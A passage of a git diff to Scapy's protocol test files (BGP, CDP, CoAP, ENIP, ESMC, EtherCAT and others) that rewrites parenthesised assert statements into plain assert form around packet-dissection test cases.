m.path_attr[0].attribute.afi_safi_specific.withdrawn_routes[0].prefix == "6000::/3" +assert m.nlri == [] = BGPUpdate - Dissection (with BGP Additional Path) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x05\x00\x01\x01\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\xd0\x02\x00\xb9\x00\x00\x00\x02\x00\x00\x00\x00\x04 \n\xe9\x19\xb2\x00\x00\x00\x04 \n\xe9\x19\x90\x00\x00\x00\x04 \n\xe9\x19\x93\x00\x00\x00\x04 \n\xe9\x19\xbb\x00\x00\x00\x04 \n\xe9\x19\x9f\x00\x00\x00\x04 \n\xe9\x19\x8c\x00\x00\x00\x04 \n\xe9\x19\xb1\x00\x00\x00\x04 \n\xe9\x19\x8f\x00\x00\x00\x04 \n\xe9\x19\x98\x00\x00\x00\x04 \n\xe9\x19\x9b\x00\x00\x00\x04 \n\xe9\x19\x8b\x00\x00\x00\x04 \n\xe9\x19\xb3\x00\x00\x00\x04 \n\xe9\x19\x91\x00\x00\x00\x04 \n\xe9\x19\xb6\x00\x00\x00\x04 \n\xe9\x19\x94\x00\x00\x00\x04 \n\xe9\x19\x97\x00\x00\x00\x04 \n\xe9\x19\xbc\x00\x00\x00\x04 \n\xe9\x19\x9d\x00\x00\x00\x04 \n\xe9\x19\xa3\x00\x00\x00\x04 \n\xe9\x19\x84\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x005\x02\x00\x00\x00\x15@\x01\x01\x00@\x02\x00@\x03\x04\n\x16\x0cX@\x05\x04\x00\x00\x00d\x00\x00\x00\x02 \n\xe9\x00\x16\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x05\x00\x01\x02\x01') @@ -688,7 +688,7 @@ assert m.getlayer(BGPUpdate, 2).nlri[0].sprintf("%prefix%") == "10.233.0.22/32" = BGPUpdate - with BGPHeader p = BGP(raw(BGPHeader()/BGPUpdate())) -assert(BGPHeader in p and BGPUpdate in p) +assert BGPHeader in p and BGPUpdate in p ########## BGPNotification Class ################################### @@ -726,21 +726,21 @@ m.type == BGP.ROUTEREFRESH_TYPE and m.len == 23 and m.afi == 2 and m.subtype == = BGPRouteRefresh - Dissection (2) - With ORFs m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00.\x05\x00\x01\x00\x01\x01\x80\x00\x13 \x00\x00\x00\x05\x18\x18\x15\x01\x01\x00\x00\x00\x00\x00\n\x00 \x00') -assert(m.type == BGP.ROUTEREFRESH_TYPE) -assert(m.len == 46) -assert(m.afi == 1) -assert(m.subtype == 0) -assert(m.safi == 1) -assert(m.orf_data[0].when_to_refresh == 1) -assert(m.orf_data[0].orf_type == 128) -assert(m.orf_data[0].orf_len == 19) -assert(len(m.orf_data[0].entries) == 2) -assert(m.orf_data[0].entries[0].action == 0) -assert(m.orf_data[0].entries[0].match == 1) -assert(m.orf_data[0].entries[0].prefix.prefix == "1.1.0.0/21") -assert(m.orf_data[0].entries[1].action == 0) -assert(m.orf_data[0].entries[1].match == 0) -assert(m.orf_data[0].entries[1].prefix.prefix == "0.0.0.0/0") +assert m.type == BGP.ROUTEREFRESH_TYPE +assert m.len == 46 +assert m.afi == 1 +assert m.subtype == 0 +assert m.safi == 1 +assert m.orf_data[0].when_to_refresh == 1 +assert m.orf_data[0].orf_type == 128 +assert m.orf_data[0].orf_len == 19 +assert len(m.orf_data[0].entries) == 2 +assert m.orf_data[0].entries[0].action == 0 +assert m.orf_data[0].entries[0].match == 1 +assert m.orf_data[0].entries[0].prefix.prefix == "1.1.0.0/21" +assert m.orf_data[0].entries[1].action == 0 +assert m.orf_data[0].entries[1].match == 0 +assert m.orf_data[0].entries[1].prefix.prefix == "0.0.0.0/0" = BGPRouteRefresh - Dissection (3) - bad ORFS (GH3345) m = BGPRouteRefresh(b'\x00\x01\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00') diff --git a/test/contrib/bier.uts b/test/contrib/bier.uts index 5cc05c9cc14..0559c7dd742 100644 --- a/test/contrib/bier.uts +++ b/test/contrib/bier.uts @@ -10,9 +10,9 @@ from scapy.contrib.mpls import MPLS p1 = MPLS()/BIER(length=BIERLength.BIER_LEN_256)/IP()/UDP() -assert(p1[MPLS].s == 1) +assert p1[MPLS].s == 1 p2 = BIFT()/BIER(length=BIERLength.BIER_LEN_64)/IP()/UDP() -assert(p2[BIFT].s == 1) +assert p2[BIFT].s == 1 p1[MPLS] p1[BIER] diff --git a/test/contrib/cdp.uts b/test/contrib/cdp.uts index 7bc5aec4714..06b9d7f598d 100644 --- a/test/contrib/cdp.uts +++ b/test/contrib/cdp.uts @@ -8,34 +8,34 @@ = CDPv2 - Dissection (1) s = b'\x02\xb4\x8c\xfa\x00\x01\x00\x0cmyswitch\x00\x02\x00\x11\x00\x00\x00\x01\x01\x01\xcc\x00\x04\xc0\xa8\x00\xfd\x00\x03\x00\x13FastEthernet0/1\x00\x04\x00\x08\x00\x00\x00(\x00\x05\x01\x14Cisco Internetwork Operating System Software \nIOS (tm) C2950 Software (C2950-I6K2L2Q4-M), Version 12.1(22)EA14, RELEASE SOFTWARE (fc1)\nTechnical Support: http://www.cisco.com/techsupport\nCopyright (c) 1986-2010 by cisco Systems, Inc.\nCompiled Tue 26-Oct-10 10:35 by nburra\x00\x06\x00\x15cisco WS-C2950-12\x00\x08\x00$\x00\x00\x0c\x01\x12\x00\x00\x00\x00\xff\xff\xff\xff\x01\x02!\xff\x00\x00\x00\x00\x00\x00\x00\x0b\xbe\x18\x9a@\xff\x00\x00\x00\t\x00\x0cMYDOMAIN\x00\n\x00\x06\x00\x01\x00\x0b\x00\x05\x01\x00\x0e\x00\x07\x01\x00\n\x00\x12\x00\x05\x00\x00\x13\x00\x05\x00\x00\x16\x00\x11\x00\x00\x00\x01\x01\x01\xcc\x00\x04\xc0\xa8\x00\xfd' cdpv2 = CDPv2_HDR(s) -assert(len(cdpv2) == 450) -assert(cdpv2.vers == 2) -assert(cdpv2.ttl == 180) -assert(cdpv2.cksum == 0x8cfa) -assert(cdpv2.haslayer(CDPMsgDeviceID)) -assert(cdpv2.haslayer(CDPMsgAddr)) -assert(cdpv2.haslayer(CDPAddrRecordIPv4)) -assert(cdpv2.haslayer(CDPMsgPortID)) -assert(cdpv2.haslayer(CDPMsgCapabilities)) -assert(cdpv2.haslayer(CDPMsgSoftwareVersion)) -assert(cdpv2.haslayer(CDPMsgPlatform)) -assert(cdpv2.haslayer(CDPMsgProtoHello)) -assert(cdpv2.haslayer(CDPMsgVTPMgmtDomain)) -assert(cdpv2.haslayer(CDPMsgNativeVLAN)) -assert(cdpv2.haslayer(CDPMsgDuplex)) -assert(cdpv2.haslayer(CDPMsgVoIPVLANReply)) -assert(cdpv2.haslayer(CDPMsgTrustBitmap)) -assert(cdpv2.haslayer(CDPMsgUntrustedPortCoS)) -assert(cdpv2.haslayer(CDPMsgMgmtAddr)) -assert(cdpv2[CDPMsgProtoHello].len == 36) -assert(cdpv2[CDPMsgProtoHello].oui == 0xc) -assert(cdpv2[CDPMsgProtoHello].protocol_id == 0x112) -assert(cdpv2[CDPMsgTrustBitmap].type == 0x0012) -assert(cdpv2[CDPMsgTrustBitmap].len == 5) -assert(cdpv2[CDPMsgTrustBitmap].trust_bitmap == 0x0) -assert(cdpv2[CDPMsgUntrustedPortCoS].type == 0x0013) -assert(cdpv2[CDPMsgUntrustedPortCoS].len == 5) -assert(cdpv2[CDPMsgUntrustedPortCoS].untrusted_port_cos == 0x0) +assert len(cdpv2) == 450 +assert cdpv2.vers == 2 +assert cdpv2.ttl == 180 +assert cdpv2.cksum == 0x8cfa +assert cdpv2.haslayer(CDPMsgDeviceID) +assert cdpv2.haslayer(CDPMsgAddr) +assert cdpv2.haslayer(CDPAddrRecordIPv4) +assert cdpv2.haslayer(CDPMsgPortID) +assert cdpv2.haslayer(CDPMsgCapabilities) +assert cdpv2.haslayer(CDPMsgSoftwareVersion) +assert cdpv2.haslayer(CDPMsgPlatform) +assert cdpv2.haslayer(CDPMsgProtoHello) +assert cdpv2.haslayer(CDPMsgVTPMgmtDomain) +assert cdpv2.haslayer(CDPMsgNativeVLAN) +assert cdpv2.haslayer(CDPMsgDuplex) +assert cdpv2.haslayer(CDPMsgVoIPVLANReply) +assert cdpv2.haslayer(CDPMsgTrustBitmap) +assert cdpv2.haslayer(CDPMsgUntrustedPortCoS) +assert cdpv2.haslayer(CDPMsgMgmtAddr) +assert cdpv2[CDPMsgProtoHello].len == 36 +assert cdpv2[CDPMsgProtoHello].oui == 0xc +assert cdpv2[CDPMsgProtoHello].protocol_id == 0x112 +assert cdpv2[CDPMsgTrustBitmap].type == 0x0012 +assert cdpv2[CDPMsgTrustBitmap].len == 5 +assert cdpv2[CDPMsgTrustBitmap].trust_bitmap == 0x0 +assert cdpv2[CDPMsgUntrustedPortCoS].type == 0x0013 +assert cdpv2[CDPMsgUntrustedPortCoS].len == 5 +assert cdpv2[CDPMsgUntrustedPortCoS].untrusted_port_cos == 0x0 = CDPv2 - Rebuild (1) @@ -45,23 +45,23 @@ assert raw(cdpv2) == s = CDPv2 - Dissection (2) s = b'\x02\xb4\xd7\xdb\x00\x01\x00\x13SIP001122334455\x00\x02\x00\x11\x00\x00\x00\x01\x01\x01\xcc\x00\x04\xc0\xa8\x01!\x00\x03\x00\nPort 1\x00\x04\x00\x08\x00\x00\x00\x10\x00\x05\x00\x10P003-08-2-00\x00\x06\x00\x17Cisco IP Phone 7960\x00\x0f\x00\x08 \x02\x00\x01\x00\x0b\x00\x05\x01\x00\x10\x00\x06\x18\x9c' cdpv2 = CDPv2_HDR(s) -assert(cdpv2.vers == 2) -assert(cdpv2.ttl == 180) -assert(cdpv2.cksum == 0xd7db) -assert(cdpv2.haslayer(CDPMsgDeviceID)) -assert(cdpv2.haslayer(CDPMsgAddr)) -assert(cdpv2.haslayer(CDPAddrRecordIPv4)) -assert(cdpv2.haslayer(CDPMsgPortID)) -assert(cdpv2.haslayer(CDPMsgCapabilities)) -assert(cdpv2.haslayer(CDPMsgSoftwareVersion)) -assert(cdpv2.haslayer(CDPMsgPlatform)) -assert(cdpv2.haslayer(CDPMsgVoIPVLANQuery)) -assert(cdpv2.haslayer(CDPMsgDuplex)) -assert(cdpv2.haslayer(CDPMsgPower)) -assert(cdpv2[CDPMsgVoIPVLANQuery].type == 0x000f) -assert(cdpv2[CDPMsgVoIPVLANQuery].len == 8) -assert(cdpv2[CDPMsgVoIPVLANQuery].unknown1 == 0x20) -assert(cdpv2[CDPMsgVoIPVLANQuery].vlan == 512) +assert cdpv2.vers == 2 +assert cdpv2.ttl == 180 +assert cdpv2.cksum == 0xd7db +assert cdpv2.haslayer(CDPMsgDeviceID) +assert cdpv2.haslayer(CDPMsgAddr) +assert cdpv2.haslayer(CDPAddrRecordIPv4) +assert cdpv2.haslayer(CDPMsgPortID) +assert cdpv2.haslayer(CDPMsgCapabilities) +assert cdpv2.haslayer(CDPMsgSoftwareVersion) +assert cdpv2.haslayer(CDPMsgPlatform) +assert cdpv2.haslayer(CDPMsgVoIPVLANQuery) +assert cdpv2.haslayer(CDPMsgDuplex) +assert cdpv2.haslayer(CDPMsgPower) +assert cdpv2[CDPMsgVoIPVLANQuery].type == 0x000f +assert cdpv2[CDPMsgVoIPVLANQuery].len == 8 +assert cdpv2[CDPMsgVoIPVLANQuery].unknown1 == 0x20 +assert cdpv2[CDPMsgVoIPVLANQuery].vlan == 512 assert cdpv2[CDPMsgPower].sprintf("%power%") == '6300 mW' @@ -84,8 +84,8 @@ assert len(pkt) == 7 = CDPv2 - CDPMsgAddr Packet cdp_msg_addr = CDPMsgAddr(addr=[CDPAddrRecordIPv4(), CDPAddrRecordIPv6()]) -assert(cdp_msg_addr.haslayer(CDPAddrRecordIPv4)) -assert(cdp_msg_addr.haslayer(CDPAddrRecordIPv6)) -assert(len(cdp_msg_addr.addr) == 2) +assert cdp_msg_addr.haslayer(CDPAddrRecordIPv4) +assert cdp_msg_addr.haslayer(CDPAddrRecordIPv6) +assert len(cdp_msg_addr.addr) == 2 assert raw(cdp_msg_addr)[4:8] == b'\x00\x00\x00\x02' diff --git a/test/contrib/coap.uts b/test/contrib/coap.uts index a777735d839..2026bd97498 100644 --- a/test/contrib/coap.uts +++ b/test/contrib/coap.uts @@ -6,39 +6,39 @@ from scapy.contrib.coap import * + Test CoAP = CoAP default values -assert(raw(CoAP()) == b'\x40\x00\x00\x00') +assert raw(CoAP()) == b'\x40\x00\x00\x00' = Token length calculation p = CoAP(token='foobar') -assert(CoAP(raw(p)).tkl == 6) +assert CoAP(raw(p)).tkl == 6 = CON GET dissect p = CoAP(b'\x40\x01\xd9\xe1\xbb\x2e\x77\x65\x6c\x6c\x2d\x6b\x6e\x6f\x77\x6e\x04\x63\x6f\x72\x65') -assert(p.code == 1) -assert(p.ver == 1) -assert(p.tkl == 0) -assert(p.tkl == 0) -assert(p.msg_id == 55777) -assert(p.token == b'') -assert(p.type == 0) -assert(p.options == [('Uri-Path', b'.well-known'), ('Uri-Path', b'core')]) +assert p.code == 1 +assert p.ver == 1 +assert p.tkl == 0 +assert p.tkl == 0 +assert p.msg_id == 55777 +assert p.token == b'' +assert p.type == 0 +assert p.options == [('Uri-Path', b'.well-known'), ('Uri-Path', b'core')] = Extended option delta -assert(raw(CoAP(options=[("Uri-Query", "query")])) == b'\x40\x00\x00\x00\xd5\x02\x71\x75\x65\x72\x79') +assert raw(CoAP(options=[("Uri-Query", "query")])) == b'\x40\x00\x00\x00\xd5\x02\x71\x75\x65\x72\x79' = Extended option length -assert(raw(CoAP(options=[("Location-Path", 'x' * 280)])) == b'\x40\x00\x00\x00\x8e\x0b\x00' + b'\x78' * 280) +assert raw(CoAP(options=[("Location-Path", 'x' * 280)])) == b'\x40\x00\x00\x00\x8e\x0b\x00' + b'\x78' * 280 = Options should be ordered by option number -assert(raw(CoAP(options=[("Uri-Query", "b"),("Uri-Path","a")])) == b'\x40\x00\x00\x00\xb1\x61\x41\x62') +assert raw(CoAP(options=[("Uri-Query", "b"),("Uri-Path","a")])) == b'\x40\x00\x00\x00\xb1\x61\x41\x62' = Options of the same type should not be reordered -assert(raw(CoAP(options=[("Uri-Path", "b"),("Uri-Path","a")])) == b'\x40\x00\x00\x00\xb1\x62\x01\x61') +assert raw(CoAP(options=[("Uri-Path", "b"),("Uri-Path","a")])) == b'\x40\x00\x00\x00\xb1\x62\x01\x61' + Test layer binding = Destination port p = UDP()/CoAP() -assert(p[UDP].dport == 5683) +assert p[UDP].dport == 5683 = Source port s = b'\x16\x33\xa0\xa4\x00\x78\xfe\x8b\x60\x45\xd9\xe1\xc1\x28\xff\x3c\x2f\x3e\x3b\x74\x69\x74\x6c\x65\x3d\x22\x47\x65' \ @@ -46,18 +46,18 @@ s = b'\x16\x33\xa0\xa4\x00\x78\xfe\x8b\x60\x45\xd9\xe1\xc1\x28\xff\x3c\x2f\x3e\x b'\x22\x63\x6c\x6f\x63\x6b\x22\x3b\x72\x74\x3d\x22\x54\x69\x63\x6b\x73\x22\x3b\x74\x69\x74\x6c\x65\x3d\x22\x49\x6e' \ b'\x74\x65\x72\x6e\x61\x6c\x20\x43\x6c\x6f\x63\x6b\x22\x3b\x63\x74\x3d\x30\x3b\x6f\x62\x73\x2c\x3c\x2f\x61\x73\x79' \ b'\x6e\x63\x3e\x3b\x63\x74\x3d\x30' -assert(CoAP in UDP(s)) +assert CoAP in UDP(s) = building with a text/plain payload p = CoAP(ver = 1, type = 0, code = 0x42, msg_id = 0xface, options=[("Content-Format", b"\x00")], paymark = b"\xff") p /= Raw(b"\xde\xad\xbe\xef") -assert(raw(p) == b'\x40\x42\xfa\xce\xc1\x00\xff\xde\xad\xbe\xef') +assert raw(p) == b'\x40\x42\xfa\xce\xc1\x00\xff\xde\xad\xbe\xef' = dissection with a text/plain payload p = CoAP(raw(p)) -assert(p.ver == 1) -assert(p.type == 0) -assert(p.code == 0x42) -assert(p.msg_id == 0xface) -assert(isinstance(p.payload, Raw)) -assert(p.payload.load == b'\xde\xad\xbe\xef') +assert p.ver == 1 +assert p.type == 0 +assert p.code == 0x42 +assert p.msg_id == 0xface +assert isinstance(p.payload, Raw) +assert p.payload.load == b'\xde\xad\xbe\xef' diff --git a/test/contrib/eddystone.uts b/test/contrib/eddystone.uts index ab8c5ed2d58..8f80276a8ed 100644 --- a/test/contrib/eddystone.uts +++ b/test/contrib/eddystone.uts @@ -45,7 +45,7 @@ assert d == hex_bytes('1000006578616d706c650068656c6c6f0b2e68746d6c') = Eddystone URL (encode unsupported scheme) -assert(expect_exception(Exception, lambda: Eddystone_URL.from_url('gopher://example.com'))) +assert expect_exception(Exception, lambda: Eddystone_URL.from_url('gopher://example.com')) = Eddystone URL (encode advertising report) diff --git a/test/contrib/enipTCP.uts b/test/contrib/enipTCP.uts index d6e85ed2943..3c32c2ffdda 100644 --- a/test/contrib/enipTCP.uts +++ b/test/contrib/enipTCP.uts @@ -9,159 +9,159 @@ from scapy.contrib.enipTCP import * + Test ENIP/TCP Encapsulation Header = Encapsulation Header Default Values pkt=ENIPTCP() -assert(pkt.commandId == None) -assert(pkt.length == 0) -assert(pkt.session == 0) -assert(pkt.status == None) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) +assert pkt.commandId == None +assert pkt.length == 0 +assert pkt.session == 0 +assert pkt.status == None +assert pkt.senderContext == 0 +assert pkt.options == 0 + ENIP List Services = ENIP List Services Reply Command ID pkt=ENIPTCP() pkt.commandId=0x4 -assert(pkt.commandId == 0x4) +assert pkt.commandId == 0x4 = ENIP List Services Reply Default Values pkt=pkt/ENIPListServicesReply() -assert(pkt[ENIPListServicesReply].itemCount == 0) +assert pkt[ENIPListServicesReply].itemCount == 0 = ENIP List Services Reply Items Default Values pkt=pkt/ENIPListServicesReplyItems() -assert(pkt[ENIPListServicesReplyItems].itemTypeCode == 0) -assert(pkt[ENIPListServicesReplyItems].itemLength == 0) -assert(pkt[ENIPListServicesReplyItems].version == 1) -assert(pkt[ENIPListServicesReplyItems].flag == 0) -assert(pkt[ENIPListServicesReplyItems].serviceName == None) +assert pkt[ENIPListServicesReplyItems].itemTypeCode == 0 +assert pkt[ENIPListServicesReplyItems].itemLength == 0 +assert pkt[ENIPListServicesReplyItems].version == 1 +assert pkt[ENIPListServicesReplyItems].flag == 0 +assert pkt[ENIPListServicesReplyItems].serviceName == None + ENIP List Identity = ENIP List Identity Reply Command ID pkt=ENIPTCP() pkt.commandId=0x63 -assert(pkt.commandId == 0x63) +assert pkt.commandId == 0x63 = ENIP List Identity Reply Default Values pkt=pkt/ENIPListIdentityReply() -assert(pkt[ENIPListIdentityReply].itemCount == 0) +assert pkt[ENIPListIdentityReply].itemCount == 0 = ENIP List Identity Reply Items Default Values pkt=pkt/ENIPListIdentityReplyItems() -assert(pkt[ENIPListIdentityReplyItems].itemTypeCode == 0) -assert(pkt[ENIPListIdentityReplyItems].itemLength == 0) -assert(pkt[ENIPListIdentityReplyItems].itemData == b'') +assert pkt[ENIPListIdentityReplyItems].itemTypeCode == 0 +assert pkt[ENIPListIdentityReplyItems].itemLength == 0 +assert pkt[ENIPListIdentityReplyItems].itemData == b'' + ENIP List Interfaces = ENIP List Interfaces Reply Command ID pkt=ENIPTCP() pkt.commandId=0x64 -assert(pkt.commandId == 0x64) +assert pkt.commandId == 0x64 = ENIP List Interfaces Reply Default Values pkt=pkt/ENIPListInterfacesReply() -assert(pkt[ENIPListInterfacesReply].itemCount == 0) +assert pkt[ENIPListInterfacesReply].itemCount == 0 = ENIP List Interfaces Reply Items Default Values pkt=pkt/ENIPListInterfacesReplyItems() -assert(pkt[ENIPListInterfacesReplyItems].itemTypeCode == 0) -assert(pkt[ENIPListInterfacesReplyItems].itemLength == 0) -assert(pkt[ENIPListInterfacesReplyItems].itemData == b'') +assert pkt[ENIPListInterfacesReplyItems].itemTypeCode == 0 +assert pkt[ENIPListInterfacesReplyItems].itemLength == 0 +assert pkt[ENIPListInterfacesReplyItems].itemData == b'' + ENIP Register Session = ENIP Register Session Command ID pkt=ENIPTCP() pkt.commandId=0x65 -assert(pkt.commandId == 0x65) +assert pkt.commandId == 0x65 = ENIP Register Session Default Values pkt=pkt/ENIPRegisterSession() -assert(pkt[ENIPRegisterSession].protocolVersion == 1) -assert(pkt[ENIPRegisterSession].options == 0) +assert pkt[ENIPRegisterSession].protocolVersion == 1 +assert pkt[ENIPRegisterSession].options == 0 = ENIP Register Session Request registerSessionReqPkt = b'\x65\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00' pkt = ENIPTCP(registerSessionReqPkt) -assert(pkt.commandId == 0x65) -assert(pkt.length == 4) -assert(pkt.session == 0) -assert(pkt.status == 0) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) -assert(pkt[ENIPRegisterSession].protocolVersion == 1) -assert(pkt[ENIPRegisterSession].options == 0) +assert pkt.commandId == 0x65 +assert pkt.length == 4 +assert pkt.session == 0 +assert pkt.status == 0 +assert pkt.senderContext == 0 +assert pkt.options == 0 +assert pkt[ENIPRegisterSession].protocolVersion == 1 +assert pkt[ENIPRegisterSession].options == 0 = ENIP Register Session Reply registerSessionRepPkt = b'\x65\x00\x04\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00' pkt = ENIPTCP(registerSessionRepPkt) -assert(pkt.commandId == 0x65) -assert(pkt.length == 4) -assert(pkt.session == 0xa14e9a7b) -assert(pkt.status == 0) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) -assert(pkt[ENIPRegisterSession].protocolVersion == 1) -assert(pkt[ENIPRegisterSession].options == 0) +assert pkt.commandId == 0x65 +assert pkt.length == 4 +assert pkt.session == 0xa14e9a7b +assert pkt.status == 0 +assert pkt.senderContext == 0 +assert pkt.options == 0 +assert pkt[ENIPRegisterSession].protocolVersion == 1 +assert pkt[ENIPRegisterSession].options == 0 + ENIP Send RR Data = ENIP Send RR Data Command ID pkt=ENIPTCP() pkt.commandId=0x6f -assert(pkt.commandId == 0x6f) +assert pkt.commandId == 0x6f = ENIP Send RR Data Default Values pkt=pkt/ENIPSendRRData() -assert(pkt[ENIPSendRRData].interfaceHandle == 0) -assert(pkt[ENIPSendRRData].timeout == 0) -assert(pkt[ENIPSendRRData].encapsulatedPacket == None) +assert pkt[ENIPSendRRData].interfaceHandle == 0 +assert pkt[ENIPSendRRData].timeout == 0 +assert pkt[ENIPSendRRData].encapsulatedPacket == None = ENIP Send RR Data Request sendRRDataReqPkt = b'\x6f\x00\x3e\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x2e\x00' pkt = ENIPTCP(sendRRDataReqPkt) -assert(pkt.commandId == 0x6f) -assert(pkt.length == 62) -assert(pkt.session == 0xa14e9a7b) -assert(pkt.status == 0) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) -assert(pkt[ENIPSendRRData].interfaceHandle == 0) -assert(pkt[ENIPSendRRData].timeout == 0) -assert(pkt[EncapsulatedPacket].itemCount == 2) +assert pkt.commandId == 0x6f +assert pkt.length == 62 +assert pkt.session == 0xa14e9a7b +assert pkt.status == 0 +assert pkt.senderContext == 0 +assert pkt.options == 0 +assert pkt[ENIPSendRRData].interfaceHandle == 0 +assert pkt[ENIPSendRRData].timeout == 0 +assert pkt[EncapsulatedPacket].itemCount == 2 = ENIP Send RR Data Reply sendRRDataRepPkt = b'\x6f\x00\x2e\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x1e\x00' pkt = ENIPTCP(sendRRDataRepPkt) -assert(pkt.commandId == 0x6f) -assert(pkt.length == 46) -assert(pkt.session == 0xa14e9a7b) -assert(pkt.status == 0) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) -assert(pkt[ENIPSendRRData].interfaceHandle == 0) -assert(pkt[ENIPSendRRData].timeout == 1024) -assert(pkt[EncapsulatedPacket].item[0].typeId == 0) -assert(pkt[EncapsulatedPacket].item[0].length == 0) -assert(pkt[EncapsulatedPacket].item[1].typeId == 0x00b2) -assert(pkt[EncapsulatedPacket].item[1].length == 30) +assert pkt.commandId == 0x6f +assert pkt.length == 46 +assert pkt.session == 0xa14e9a7b +assert pkt.status == 0 +assert pkt.senderContext == 0 +assert pkt.options == 0 +assert pkt[ENIPSendRRData].interfaceHandle == 0 +assert pkt[ENIPSendRRData].timeout == 1024 +assert pkt[EncapsulatedPacket].item[0].typeId == 0 +assert pkt[EncapsulatedPacket].item[0].length == 0 +assert pkt[EncapsulatedPacket].item[1].typeId == 0x00b2 +assert pkt[EncapsulatedPacket].item[1].length == 30 + ENIP Send Unit Data = ENIP Send Unit Data Command ID pkt=ENIPTCP() pkt.commandId=0x70 -assert(pkt.commandId == 0x70) +assert pkt.commandId == 0x70 = ENIP Send Unit Data Default Values pkt=pkt/ENIPSendUnitData() -assert(pkt[ENIPSendUnitData].interfaceHandle == 0) -assert(pkt[ENIPSendUnitData].timeout == 0) -assert(pkt[ENIPSendUnitData].encapsulatedPacket == None) +assert pkt[ENIPSendUnitData].interfaceHandle == 0 +assert pkt[ENIPSendUnitData].timeout == 0 +assert pkt[ENIPSendUnitData].encapsulatedPacket == None = ENIP Send Unit Data @@ -169,22 +169,22 @@ sendUnitDataPkt = b'\x70\x00\x2d\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00 pkt = ENIPTCP(sendUnitDataPkt) -assert(pkt.commandId == 0x70) -assert(pkt.length == 45) -assert(pkt.session == 0xa14e9a7b) -assert(pkt.status == 0) -assert(pkt.senderContext == 0) -assert(pkt.options == 0) -assert(pkt[ENIPSendUnitData].interfaceHandle == 0) -assert(pkt[ENIPSendUnitData].timeout == 0) -assert(pkt[EncapsulatedPacket].itemCount == 2) - -assert(pkt[EncapsulatedPacket].item[0].typeId == 0x00a1) -assert(pkt[EncapsulatedPacket].item[0].length == 4) -assert(pkt[EncapsulatedPacket].item[0].data == b'\x7b\x9a\x60\xcc') -assert(pkt[EncapsulatedPacket].item[1].typeId == 0x00b1) -assert(pkt[EncapsulatedPacket].item[1].length == 25) -assert(pkt[EncapsulatedPacket].item[1].data == b'\x00\x01') +assert pkt.commandId == 0x70 +assert pkt.length == 45 +assert pkt.session == 0xa14e9a7b +assert pkt.status == 0 +assert pkt.senderContext == 0 +assert pkt.options == 0 +assert pkt[ENIPSendUnitData].interfaceHandle == 0 +assert pkt[ENIPSendUnitData].timeout == 0 +assert pkt[EncapsulatedPacket].itemCount == 2 + +assert pkt[EncapsulatedPacket].item[0].typeId == 0x00a1 +assert pkt[EncapsulatedPacket].item[0].length == 4 +assert pkt[EncapsulatedPacket].item[0].data == b'\x7b\x9a\x60\xcc' +assert pkt[EncapsulatedPacket].item[1].typeId == 0x00b1 +assert pkt[EncapsulatedPacket].item[1].length == 25 +assert pkt[EncapsulatedPacket].item[1].data == b'\x00\x01' diff --git a/test/contrib/esmc.uts b/test/contrib/esmc.uts index 1602c6e5394..ed01e85466c 100644 --- a/test/contrib/esmc.uts +++ b/test/contrib/esmc.uts @@ -12,11 +12,11 @@ pkt.show() s = raw(pkt) raw_pkt = b'\x01\x80\xc2\x00\x00\x02\x00\x13\xc4\x12\x0f\x0d\x88\x09\x0a\x00\x19\xa7\x00' \ b'\x01\x18\x00\x00\x00\x01\x00\x04\x02' -assert(s == raw_pkt) +assert s == raw_pkt p = Ether(s) -assert(SlowProtocol in p and ESMC in p and QLTLV in p) -assert(raw(p) == raw_pkt) +assert SlowProtocol in p and ESMC in p and QLTLV in p +assert raw(p) == raw_pkt = Build & dissect ESMC and EQLTLV @@ -26,8 +26,8 @@ s = raw(pkt) raw_pkt = b'\x01\x80\xc2\x00\x00\x02\x00\x13\xc4\x12\x0f\x0d\x88\x09\x0a\x00\x19\xa7\x00' \ b'\x01\x18\x00\x00\x00\x01\x00\x04\x02\x02\x00\x14\xff\x11\x22\x33\x44\x55\x66' \ b'\x77\x88\x00\x01\x00\x00\x00\x00\x00\x00' -assert(s == raw_pkt) +assert s == raw_pkt p = Ether(s) -assert(SlowProtocol in p and ESMC in p and QLTLV in p and EQLTLV in p) -assert(raw(p) == raw_pkt) +assert SlowProtocol in p and ESMC in p and QLTLV in p and EQLTLV in p +assert raw(p) == raw_pkt diff --git a/test/contrib/ethercat.uts b/test/contrib/ethercat.uts index 6f246c77eaa..20f63571759 100644 --- a/test/contrib/ethercat.uts +++ b/test/contrib/ethercat.uts @@ -81,7 +81,7 @@ for data in test_data: ''' # compare values for key in data: - assert(getattr(bf,key) == data[key]) + assert getattr(bf,key) == data[key] assert (getattr(bf_le, key) == data[key]) = Avoid mix of LEBitFields and BitFields @@ -159,24 +159,24 @@ frm = Ether() / EtherCat() # even with padding the length must be zero # the Ether(do_build()) forces the calculation of all (post_build generated) fields frm = Ether(frm.do_build()) -assert(frm[EtherCat].length == 0) -assert(len(frm) == 60) +assert frm[EtherCat].length == 0 +assert len(frm) == 60 frm = Ether()/Dot1Q()/Dot1Q()/EtherCat() frm = Ether()/EtherCat() 